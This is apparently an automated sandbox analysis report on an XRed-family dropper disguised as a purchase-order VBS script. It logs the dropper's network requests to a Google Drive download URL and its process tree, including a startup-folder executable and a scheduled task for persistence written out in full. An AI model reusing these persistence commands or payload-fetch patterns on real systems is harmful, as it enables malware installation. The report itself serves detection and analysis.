                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        145192.168.2.750190142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:50 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:50 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6aX6ttD9KgBWR3kvDukDEJUG10DMgvxXnC7F9wdoo3yacrFa7RNiFqZ1Tvj2CzdeUK
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:50 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4OTMKfTK9Z79lD8xm8TWlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:50 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:50 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 6e 4d 47 46 71 55 2d 51 69 70 35 5a 34 69 76 31 45 55 77 4a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="cnMGFqU-Qip5Z4iv1EUwJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:50 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        146192.168.2.750192142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:51 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:51 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:51 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-31XKlfK54AQSN5OWb0AnJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        147192.168.2.750193142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:51 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:51 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7yaUzypYSlbbFQXaGO7KHVbJCwY9dk8ldLNJI01K7aekDcmuxHMBXpm7N7xS2QtSE6
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:51 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-EfXjMlrs8_4GcByW26NkzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:51 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:51 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 70 55 77 68 41 77 79 51 47 75 4d 4d 66 76 72 56 33 5f 7a 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="-pUwhAwyQGuMMfvrV3_zNQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:51 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        148192.168.2.750194142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:51 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        149192.168.2.750195142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:51 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:05:47:35
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs"
                                                                                                                                                        Imagebase:0x7ff7e10f0000
                                                                                                                                                        File size:170'496 bytes
                                                                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1311156718.0000019411790000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1311247337.0000019410D85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1308511468.000001941172A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1308437430.0000019411CC3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:8
                                                                                                                                                        Start time:05:47:41
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:1'989'120 bytes
                                                                                                                                                        MD5 hash:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:05:47:52
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:1'989'120 bytes
                                                                                                                                                        MD5 hash:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:14
                                                                                                                                                        Start time:05:47:52
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:1'989'120 bytes
                                                                                                                                                        MD5 hash:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:15
                                                                                                                                                        Start time:05:47:53
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                                                                                                                                        Imagebase:0x120000
                                                                                                                                                        File size:1'217'536 bytes
                                                                                                                                                        MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 68%, ReversingLabs
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:16
                                                                                                                                                        Start time:05:47:54
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:771'584 bytes
                                                                                                                                                        MD5 hash:B50AAC59E97F3D38A19ACB9253FABEBC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:17
                                                                                                                                                        Start time:05:47:56
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                                                                                                                                                        Imagebase:0x410000
                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:18
                                                                                                                                                        Start time:05:47:56
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                        Imagebase:0x40000
                                                                                                                                                        File size:53'161'064 bytes
                                                                                                                                                        MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:19
                                                                                                                                                        Start time:05:47:56
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:20
                                                                                                                                                        Start time:05:47:56
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                                                                                                                                                        Imagebase:0xee0000
                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:21
                                                                                                                                                        Start time:05:47:56
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs
                                                                                                                                                        Imagebase:0x750000
                                                                                                                                                        File size:147'456 bytes
                                                                                                                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000015.00000002.2552714676.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000015.00000002.2549958974.0000000002FBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
